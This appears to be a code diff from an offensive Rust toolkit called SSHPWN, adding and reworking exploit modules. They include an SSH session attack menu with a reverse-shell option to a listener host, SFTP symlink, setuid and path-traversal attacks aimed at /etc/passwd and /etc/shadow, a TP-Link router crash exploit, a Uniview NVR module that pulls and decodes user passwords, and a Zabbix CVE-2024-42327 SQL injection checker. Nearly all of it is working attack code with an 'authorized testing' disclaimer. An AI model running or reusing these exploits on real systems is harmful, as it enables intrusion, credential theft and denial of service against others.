println!(" 5. Upload File");
|
||||
println!(" 6. Download File");
|
||||
println!();
|
||||
|
||||
let mode = prompt_default("Attack mode", "1")?;
|
||||
|
||||
let password_ref = password.as_deref();
|
||||
let keyfile_ref = keyfile.as_deref();
|
||||
|
||||
match mode.as_str() {
|
||||
"1" => {
|
||||
attack_session_env_injection(&host, port, &username, password_ref, keyfile_ref, None).await?;
|
||||
}
|
||||
"2" => {
|
||||
let command = prompt_default("Command to execute", "id")?;
|
||||
attack_exec(&host, port, &username, password_ref, keyfile_ref, &command, 30).await?;
|
||||
}
|
||||
"3" => {
|
||||
attack_interactive_shell(&host, port, &username, password_ref, keyfile_ref).await?;
|
||||
}
|
||||
"4" => {
|
||||
let lhost = prompt("Listener IP (LHOST)")?;
|
||||
if lhost.is_empty() {
|
||||
return Err(anyhow!("LHOST is required"));
|
||||
}
|
||||
let lport: u16 = prompt_default("Listener Port (LPORT)", "4444")?.parse().unwrap_or(4444);
|
||||
|
||||
println!();
|
||||
println!("{}", "Available payloads:".cyan());
|
||||
let payloads = get_reverse_shell_payloads();
|
||||
for key in payloads.keys() {
|
||||
println!(" - {}", key);
|
||||
}
|
||||
let payload_type = prompt_default("Payload type", "bash")?;
|
||||
|
||||
attack_revshell(&host, port, &username, password_ref, keyfile_ref, &lhost, lport, &payload_type).await?;
|
||||
}
|
||||
"5" => {
|
||||
let local_path = prompt("Local file path")?;
|
||||
let remote_path = prompt("Remote file path")?;
|
||||
attack_upload(&host, port, &username, password_ref, keyfile_ref, &local_path, &remote_path).await?;
|
||||
}
|
||||
"6" => {
|
||||
let remote_path = prompt("Remote file path")?;
|
||||
let local_path = prompt("Local file path")?;
|
||||
attack_download(&host, port, &username, password_ref, keyfile_ref, &remote_path, &local_path).await?;
|
||||
}
|
||||
_ => {
|
||||
println!("{}", "[-] Invalid mode".red());
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Session attack module complete".green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -0,0 +1,452 @@
|
||||
//! SSHPWN SFTP Attack Module
|
||||
//!
|
||||
//! Based on OpenSSH 10.0p1 vulnerability analysis
|
||||
//!
|
||||
//! SFTP-SERVER VULNERABILITIES (sftp-server.c):
|
||||
//! - process_symlink() - Symlink target injection (HIGH)
|
||||
//! - process_setstat() - chmod allows setuid via 07777 mask (HIGH)
|
||||
//! - process_open() - Path traversal (HIGH)
|
||||
//! - process_write() - Partial write atomicity issues
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
io::{Read, Write},
|
||||
net::TcpStream,
|
||||
path::Path,
|
||||
time::Duration,
|
||||
};
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 30;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSHPWN - SFTP Attack Module ║".cyan());
|
||||
println!("{}", "║ Based on OpenSSH sftp-server.c vulnerability analysis ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Attack Modes: ║".cyan());
|
||||
println!("{}", "║ 1. Symlink Injection (process_symlink) ║".cyan());
|
||||
println!("{}", "║ 2. Setuid Bit Attack (process_setstat 07777) ║".cyan());
|
||||
println!("{}", "║ 3. Path Traversal (process_open) ║".cyan());
|
||||
println!("{}", "║ 4. Partial Write Race (process_write) ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create SSH session with authentication
|
||||
fn create_ssh_session(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
timeout_secs: u64,
|
||||
) -> Result<(TcpStream, Session)> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
let tcp = TcpStream::connect_timeout(
|
||||
&addr.parse().context("Invalid address")?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
).context("Connection failed")?;
|
||||
|
||||
tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
|
||||
let mut sess = Session::new()?;
|
||||
sess.set_tcp_stream(tcp.try_clone()?);
|
||||
sess.handshake()?;
|
||||
|
||||
// Authenticate
|
||||
if let Some(key) = keyfile {
|
||||
sess.userauth_pubkey_file(username, None, Path::new(key), password)?;
|
||||
} else if let Some(pass) = password {
|
||||
sess.userauth_password(username, pass)?;
|
||||
} else {
|
||||
return Err(anyhow!("No authentication method provided"));
|
||||
}
|
||||
|
||||
if !sess.authenticated() {
|
||||
return Err(anyhow!("Authentication failed"));
|
||||
}
|
||||
|
||||
Ok((tcp, sess))
|
||||
}
|
||||
|
||||
/// SFTP Symlink Attack - Create symlink to sensitive file
|
||||
///
|
||||
/// Vulnerability: sftp-server.c process_symlink() does not validate symlink target.
|
||||
/// Client can create symlinks pointing anywhere, bypassing chroot restrictions.
|
||||
pub async fn attack_sftp_symlink(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
target_file: &str,
|
||||
link_name: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SFTP Symlink Attack on {}", host).cyan());
|
||||
println!("{}", format!("[*] Target file: {}", target_file).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
let sftp = sess.sftp().context("SFTP initialization failed")?;
|
||||
|
||||
let link_path = link_name
|
||||
.map(|s| s.to_string())
|
||||
.unwrap_or_else(|| format!("/tmp/.symlink_attack_{}", std::process::id()));
|
||||
|
||||
// Create symlink to target (this is the vulnerability)
|
||||
// sftp-server.c:1491: r = symlink(oldpath, newpath);
|
||||
match sftp.symlink(Path::new(target_file), Path::new(&link_path)) {
|
||||
Ok(_) => {
|
||||
println!("{}", format!("[VULN] Created symlink: {} -> {}", link_path, target_file).red().bold());
|
||||
|
||||
// Try to read through symlink
|
||||
match sftp.open(Path::new(&link_path)) {
|
||||
Ok(mut file) => {
|
||||
let mut content = String::new();
|
||||
if file.read_to_string(&mut content).is_ok() {
|
||||
println!("{}", format!("[PWNED] Read {} via symlink:", target_file).red().bold());
|
||||
println!();
|
||||
// Show first 500 chars
|
||||
let preview: String = content.chars().take(500).collect();
|
||||
println!("{}", preview);
|
||||
println!();
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[!] Read failed (may need permissions): {}", e).yellow());
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
let _ = sftp.unlink(Path::new(&link_path));
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Symlink attack failed: {}", e).red());
|
||||
Ok(false)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// SFTP chmod Setuid Attack - Set setuid bit on uploaded file
|
||||
///
|
||||
/// Vulnerability: sftp-server.c process_setstat() uses 07777 mask.
|
||||
/// This allows setting setuid(04000), setgid(02000), sticky(01000) bits.
|
||||
pub async fn attack_sftp_setuid(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
target_file: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SFTP Setuid Attack on {}", host).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
let sftp = sess.sftp().context("SFTP initialization failed")?;
|
||||
|
||||
let test_file = target_file
|
||||
.map(|s| s.to_string())
|
||||
.unwrap_or_else(|| format!("/tmp/setuid_test_{}", std::process::id()));
|
||||
|
||||
// Create test file
|
||||
{
|
||||
let mut file = sftp.create(Path::new(&test_file))?;
|
||||
file.write_all(b"#!/bin/sh\nid\n")?;
|
||||
}
|
||||
|
||||
println!("{}", format!("[*] Created test file: {}", test_file).cyan());
|
||||
|
||||
// Try to set setuid bit (0o4755 = setuid + rwxr-xr-x)
|
||||
// sftp-server.c:1102: r = chmod(name, a.perm & 07777);
|
||||
match sftp.setstat(Path::new(&test_file), ssh2::FileStat {
|
||||
size: None,
|
||||
uid: None,
|
||||
gid: None,
|
||||
perm: Some(0o4755),
|
||||
atime: None,
|
||||
mtime: None,
|
||||
}) {
|
||||
Ok(_) => {
|
||||
// Verify
|
||||
match sftp.stat(Path::new(&test_file)) {
|
||||
Ok(stat) => {
|
||||
if let Some(mode) = stat.perm {
|
||||
let mode_masked = mode & 0o7777;
|
||||
if mode_masked & 0o4000 != 0 {
|
||||
println!("{}", format!("[VULN] Setuid bit set! Mode: {:o}", mode_masked).red().bold());
|
||||
println!("{}", format!("[PWNED] File {} has setuid bit", test_file).red().bold());
|
||||
let _ = sftp.unlink(Path::new(&test_file));
|
||||
return Ok(true);
|
||||
} else {
|
||||
println!("{}", format!("[*] Setuid stripped. Mode: {:o}", mode_masked).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[!] Stat failed: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Chmod failed: {}", e).red());
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
let _ = sftp.unlink(Path::new(&test_file));
|
||||
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
/// SFTP Path Traversal - Attempt to access files outside allowed directory
|
||||
pub async fn attack_sftp_traversal(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
target_path: &str,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SFTP Path Traversal on {}", host).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
let sftp = sess.sftp().context("SFTP initialization failed")?;
|
||||
|
||||
let traversal_paths = vec![
|
||||
target_path.to_string(),
|
||||
format!("../../../..{}", target_path),
|
||||
format!("....//....//....//..../{}", target_path),
|
||||
format!("/..{}", target_path),
|
||||
format!("/./{}", target_path),
|
||||
];
|
||||
|
||||
for path in &traversal_paths {
|
||||
println!("{}", format!("[*] Trying: {}", path).cyan());
|
||||
|
||||
match sftp.open(Path::new(path)) {
|
||||
Ok(mut file) => {
|
||||
let mut content = String::new();
|
||||
if file.read_to_string(&mut content).is_ok() {
|
||||
println!("{}", "[VULN] Path traversal successful!".red().bold());
|
||||
println!();
|
||||
let preview: String = content.chars().take(200).collect();
|
||||
println!("{}", preview);
|
||||
println!();
|
||||
return Ok(true);
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
let err_str = e.to_string();
|
||||
if err_str.contains("Permission denied") {
|
||||
println!("{}", "[*] Permission denied (chroot may be working)".dimmed());
|
||||
} else if err_str.contains("No such file") {
|
||||
println!("{}", "[*] File not found".dimmed());
|
||||
} else {
|
||||
println!("{}", format!("[*] Blocked: {}", e).dimmed());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!("{}", "[-] Path traversal blocked".yellow());
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
/// SFTP Partial Write Attack - Exploit atomicity issues in writes
|
||||
///
|
||||
/// Vulnerability: sftp-server.c process_write() may not complete writes atomically.
|
||||
pub async fn attack_sftp_partial_write(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SFTP Partial Write Attack on {}", host).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
let sftp = sess.sftp().context("SFTP initialization failed")?;
|
||||
|
||||
let test_file = format!("/tmp/partial_write_test_{}", std::process::id());
|
||||
|
||||
println!("{}", "[*] Testing partial write scenarios...".cyan());
|
||||
|
||||
// Test 1: Large write that might be split
|
||||
let large_data = vec![b'A'; 1024 * 1024]; // 1MB
|
||||
|
||||
match sftp.create(Path::new(&test_file)) {
|
||||
Ok(mut file) => {
|
||||
match file.write_all(&large_data) {
|
||||
Ok(_) => {
|
||||
// Verify write completed
|
||||
match sftp.stat(Path::new(&test_file)) {
|
||||
Ok(stat) => {
|
||||
if let Some(size) = stat.size {
|
||||
if size as usize == large_data.len() {
|
||||
println!("{}", format!("[+] Full write completed: {} bytes", size).green());
|
||||
} else {
|
||||
println!("{}", format!("[VULN] Partial write! Expected {}, got {}", large_data.len(), size).red().bold());
|
||||
let _ = sftp.unlink(Path::new(&test_file));
|
||||
return Ok(true);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[!] Stat failed: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[*] Write test: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Create failed: {}", e).red());
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
let _ = sftp.unlink(Path::new(&test_file));
|
||||
|
||||
println!("{}", "[*] Partial write testing complete".cyan());
|
||||
println!("{}", "[*] Note: Race conditions require concurrent access testing".yellow());
|
||||
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_optional(message: &str) -> Result<Option<String>> {
|
||||
print!("{} (leave empty to skip): ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(None)
|
||||
} else {
|
||||
Ok(Some(trimmed.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let host = normalize_target(target);
|
||||
println!("{}", format!("[*] Target: {}", host).cyan());
|
||||
|
||||
// Get connection parameters
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(22);
|
||||
let username = prompt("Username")?;
|
||||
if username.is_empty() {
|
||||
return Err(anyhow!("Username is required"));
|
||||
}
|
||||
|
||||
let password = prompt_optional("Password")?;
|
||||
let keyfile = prompt_optional("SSH Key File Path")?;
|
||||
|
||||
if password.is_none() && keyfile.is_none() {
|
||||
return Err(anyhow!("Either password or keyfile is required"));
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "Select attack mode:".yellow().bold());
|
||||
println!(" 1. Symlink Injection (read sensitive files)");
|
||||
println!(" 2. Setuid Bit Attack (privilege escalation)");
|
||||
println!(" 3. Path Traversal (escape chroot)");
|
||||
println!(" 4. Partial Write Test (race condition)");
|
||||
println!(" 5. Run All Attacks");
|
||||
println!();
|
||||
|
||||
let mode = prompt_default("Attack mode", "5")?;
|
||||
|
||||
let password_ref = password.as_deref();
|
||||
let keyfile_ref = keyfile.as_deref();
|
||||
|
||||
match mode.as_str() {
|
||||
"1" => {
|
||||
let target_file = prompt_default("Target file to read", "/etc/passwd")?;
|
||||
attack_sftp_symlink(&host, port, &username, password_ref, keyfile_ref, &target_file, None).await?;
|
||||
}
|
||||
"2" => {
|
||||
attack_sftp_setuid(&host, port, &username, password_ref, keyfile_ref, None).await?;
|
||||
}
|
||||
"3" => {
|
||||
let target_path = prompt_default("Target path", "/etc/passwd")?;
|
||||
attack_sftp_traversal(&host, port, &username, password_ref, keyfile_ref, &target_path).await?;
|
||||
}
|
||||
"4" => {
|
||||
attack_sftp_partial_write(&host, port, &username, password_ref, keyfile_ref).await?;
|
||||
}
|
||||
"5" | _ => {
|
||||
println!();
|
||||
println!("{}", "=== Running All SFTP Attacks ===".yellow().bold());
|
||||
println!();
|
||||
|
||||
println!("{}", "--- Attack 1: Symlink Injection ---".cyan());
|
||||
let _ = attack_sftp_symlink(&host, port, &username, password_ref, keyfile_ref, "/etc/passwd", None).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 2: Setuid Bit ---".cyan());
|
||||
let _ = attack_sftp_setuid(&host, port, &username, password_ref, keyfile_ref, None).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 3: Path Traversal ---".cyan());
|
||||
let _ = attack_sftp_traversal(&host, port, &username, password_ref, keyfile_ref, "/etc/shadow").await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 4: Partial Write ---".cyan());
|
||||
let _ = attack_sftp_partial_write(&host, port, &username, password_ref, keyfile_ref).await;
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] SFTP attack module complete".green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -13,11 +13,23 @@
|
||||
|
||||
use anyhow::Result;
|
||||
use base64::{engine::general_purpose, Engine as _};
|
||||
use reqwest::{Client, header::HeaderMap};
|
||||
use std::io;
|
||||
use colored::*;
|
||||
use reqwest::{header::HeaderMap, Client};
|
||||
use std::io::{self, Write};
|
||||
use tokio::net::TcpStream;
|
||||
use tokio::time::{timeout, Duration};
|
||||
|
||||
const DEFAULT_PORT: u16 = 8082;
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ TP-Link TL-WR740N Buffer Overflow DoS Exploit ║".cyan());
|
||||
println!("{}", "║ Crashes router web server via crafted ping request ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
/// Normalize IP to handle IPv6 and multiple brackets
|
||||
fn normalize_ip(ip: &str) -> String {
|
||||
// Remove all surrounding brackets
|
||||
@@ -47,6 +59,8 @@ async fn execute(ip: &str, port: u16, username: &str, password: &str) -> Result<
|
||||
payload = payload
|
||||
);
|
||||
|
||||
println!("{}", format!("[*] Sending exploit payload to {}:{}", ip, port).yellow());
|
||||
|
||||
// Build basic auth header
|
||||
let credentials = format!("{username}:{password}");
|
||||
let encoded_credentials = general_purpose::STANDARD.encode(credentials.as_bytes());
|
||||
@@ -65,28 +79,32 @@ async fn execute(ip: &str, port: u16, username: &str, password: &str) -> Result<
|
||||
|
||||
let client = Client::builder()
|
||||
.default_headers(headers)
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()?;
|
||||
|
||||
let response = client.get(&target_url).send().await?;
|
||||
|
||||
if response.status().as_u16() == 200 {
|
||||
println!("[+] Server Crashed (200 OK received)");
|
||||
println!("{}", "[+] Exploit sent successfully (200 OK received)".green().bold());
|
||||
let body = response.text().await.unwrap_or_default();
|
||||
println!("{}", body);
|
||||
if !body.is_empty() {
|
||||
println!("{}", body);
|
||||
}
|
||||
} else {
|
||||
println!(
|
||||
"[-] Script Completed with status code: {}",
|
||||
response.status()
|
||||
"{}",
|
||||
format!("[-] Request completed with status code: {}", response.status()).yellow()
|
||||
);
|
||||
}
|
||||
|
||||
// Check if the host is still up — timeout after 1 second
|
||||
println!("{}", "[*] Checking if target is still reachable...".cyan());
|
||||
match timeout(Duration::from_secs(1), TcpStream::connect((ip.trim_matches(&['[', ']'][..]), port))).await {
|
||||
Ok(Ok(_)) => {
|
||||
println!("[!] Target still responds on port {}. DoS likely failed.", port);
|
||||
println!("{}", format!("[!] Target still responds on port {}. DoS may have failed.", port).yellow());
|
||||
}
|
||||
_ => {
|
||||
println!("[+] Target no longer reachable on port {} — likely crashed. Returning to menu.", port);
|
||||
println!("{}", format!("[+] Target no longer reachable on port {} — likely crashed!", port).green().bold());
|
||||
}
|
||||
}
|
||||
|
||||
@@ -95,20 +113,32 @@ async fn execute(ip: &str, port: u16, username: &str, password: &str) -> Result<
|
||||
|
||||
/// Entry point required by auto-dispatch
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("Enter router port (default is 8082): ");
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
println!();
|
||||
|
||||
print!("{}", format!("Enter router port (default {}): ", DEFAULT_PORT).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut port_str = String::new();
|
||||
io::stdin().read_line(&mut port_str)?;
|
||||
let port: u16 = port_str.trim().parse().unwrap_or(8082);
|
||||
let port: u16 = port_str.trim().parse().unwrap_or(DEFAULT_PORT);
|
||||
|
||||
println!("Enter username: ");
|
||||
print!("{}", "Enter username: ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut username = String::new();
|
||||
io::stdin().read_line(&mut username)?;
|
||||
let username = username.trim();
|
||||
|
||||
println!("Enter password: ");
|
||||
print!("{}", "Enter password: ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut password = String::new();
|
||||
io::stdin().read_line(&mut password)?;
|
||||
let password = password.trim();
|
||||
|
||||
if username.is_empty() || password.is_empty() {
|
||||
println!("{}", "[-] Username and password are required".red());
|
||||
return Err(anyhow::anyhow!("Username and password are required"));
|
||||
}
|
||||
|
||||
execute(target, port, username, password).await
|
||||
}
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use quick_xml::events::Event;
|
||||
use quick_xml::name::QName;
|
||||
use quick_xml::Reader;
|
||||
@@ -8,6 +9,16 @@ use std::fs::OpenOptions;
|
||||
use std::io::Write;
|
||||
use std::time::Duration;
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ Uniview NVR Remote Password Disclosure ║".cyan());
|
||||
println!("{}", "║ Extracts and decodes user credentials from NVR ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
/// Reverses the Uniview custom encoded password
|
||||
fn decode_pass(encoded: &str) -> String {
|
||||
let map: HashMap<&str, &str> = [
|
||||
@@ -89,20 +100,21 @@ fn normalize_target(raw: &str) -> String {
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("\nUniview NVR remote passwords disclosure!");
|
||||
println!("Author: B1t (ported to Rust)\n");
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
println!();
|
||||
|
||||
// Normalize URL (scheme, IPv6 brackets, port, path)
|
||||
let target = normalize_target(target);
|
||||
|
||||
let client = Client::builder()
|
||||
.danger_accept_invalid_certs(true)
|
||||
.timeout(Duration::from_secs(10))
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()
|
||||
.context("Failed to build HTTP client")?;
|
||||
|
||||
// Fetch version info
|
||||
println!("[+] Getting model name and software version...");
|
||||
println!("{}", "[*] Getting model name and software version...".cyan());
|
||||
let version_url = format!("{}/cgi-bin/main-cgi?json={{\"cmd\":116}}", target);
|
||||
let version_text = client
|
||||
.get(&version_url)
|
||||
@@ -121,8 +133,8 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
.and_then(|s| s.split('"').next())
|
||||
.unwrap_or("Unknown");
|
||||
|
||||
println!("Model: {}", model);
|
||||
println!("Software Version: {}", sw_ver);
|
||||
println!("{}", format!("[+] Model: {}", model).green());
|
||||
println!("{}", format!("[+] Software Version: {}", sw_ver).green());
|
||||
|
||||
// Prepare log file
|
||||
let mut log = OpenOptions::new()
|
||||
@@ -137,7 +149,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
writeln!(log, "Software Version: {}", sw_ver).ok();
|
||||
|
||||
// Fetch user config
|
||||
println!("\n[+] Getting configuration file...");
|
||||
println!("{}", "\n[*] Getting configuration file...".cyan());
|
||||
let config_url = format!(
|
||||
"{}/cgi-bin/main-cgi?json={{\"cmd\":255,\"szUserName\":\"\",\"u32UserLoginHandle\":8888888888}}",
|
||||
target
|
||||
@@ -155,7 +167,8 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let mut buf = Vec::new();
|
||||
let mut total_users = 0;
|
||||
|
||||
println!("\nUser | Stored Hash | Reversible Password");
|
||||
println!();
|
||||
println!("{}", "User | Stored Hash | Reversible Password".cyan().bold());
|
||||
println!("{}", "_".repeat(80));
|
||||
writeln!(log, "\nUser | Stored Hash | Reversible Password").ok();
|
||||
writeln!(log, "{}", "_".repeat(80)).ok();
|
||||
@@ -177,7 +190,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
|
||||
let decoded = decode_pass(&revpass);
|
||||
println!("{:<9}| {:<38}| {}", username, user_hash, decoded);
|
||||
println!("{}", format!("{:<9}| {:<38}| {}", username, user_hash, decoded).green());
|
||||
writeln!(log, "{:<9}| {:<38}| {}", username, user_hash, decoded).ok();
|
||||
|
||||
total_users += 1;
|
||||
@@ -189,9 +202,11 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
buf.clear();
|
||||
}
|
||||
|
||||
println!("\n[+] Total users: {}", total_users);
|
||||
println!();
|
||||
println!("{}", format!("[+] Total users found: {}", total_users).green().bold());
|
||||
writeln!(log, "\n[+] Total users: {}", total_users).ok();
|
||||
println!("\n*Note: 'default' and 'HAUser' users may not be accessible remotely.*\n");
|
||||
println!("{}", "[*] Results saved to nvr-success.txt".cyan());
|
||||
println!("{}", "[!] Note: 'default' and 'HAUser' users may not be accessible remotely.".yellow());
|
||||
writeln!(log, "\n*Note: 'default' and 'HAUser' users may not be accessible remotely.*\n").ok();
|
||||
|
||||
Ok(())
|
||||
|
||||
@@ -1,17 +1,34 @@
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use reqwest::Client;
|
||||
use serde_json::json;
|
||||
use std::fs;
|
||||
use std::io::{self, Write};
|
||||
use std::time::Duration;
|
||||
|
||||
const HEADERS: &str = "application/json";
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 30;
|
||||
|
||||
/// Display module banner
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ Zabbix 7.0.0 SQL Injection Checker ║".cyan());
|
||||
println!("{}", "║ CVE-2024-42327 - Time-based SQL Injection ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
}
|
||||
|
||||
// Internal function renamed to `exploit_zabbix` to avoid conflicts
|
||||
async fn exploit_zabbix(api_url: &str, username: &str, password: &str, _payload: &str) -> Result<()> {
|
||||
let client = Client::new();
|
||||
let client = Client::builder()
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.danger_accept_invalid_certs(true)
|
||||
.build()
|
||||
.map_err(|e| anyhow!("Failed to build HTTP client: {}", e))?;
|
||||
|
||||
let url = format!("{}/api_jsonrpc.php", api_url.trim_end_matches('/'));
|
||||
|
||||
// // Login to get the token
|
||||
// Login to get the token
|
||||
println!("{}", "[*] Attempting to authenticate...".cyan());
|
||||
let login_data = json!({
|
||||
"jsonrpc": "2.0",
|
||||
"method": "user.login",
|
||||
@@ -38,12 +55,15 @@ async fn exploit_zabbix(api_url: &str, username: &str, password: &str, _payload:
|
||||
|
||||
let auth_token = login_response_json
|
||||
.get("result")
|
||||
.ok_or_else(|| anyhow!("Failed to retrieve auth token"))?
|
||||
.ok_or_else(|| anyhow!("Failed to retrieve auth token - check credentials"))?
|
||||
.as_str()
|
||||
.ok_or_else(|| anyhow!("Auth token not a string"))?
|
||||
.to_string();
|
||||
|
||||
// // SQLi test using the provided payload
|
||||
println!("{}", "[+] Authentication successful".green());
|
||||
|
||||
// SQLi test using the provided payload
|
||||
println!("{}", "[*] Testing for SQL injection vulnerability...".yellow());
|
||||
let sqli_data = json!({
|
||||
"jsonrpc": "2.0",
|
||||
"method": "user.get",
|
||||
@@ -55,6 +75,7 @@ async fn exploit_zabbix(api_url: &str, username: &str, password: &str, _payload:
|
||||
"auth": auth_token
|
||||
});
|
||||
|
||||
let start = std::time::Instant::now();
|
||||
let test_response = client
|
||||
.post(&url)
|
||||
.header("Content-Type", HEADERS)
|
||||
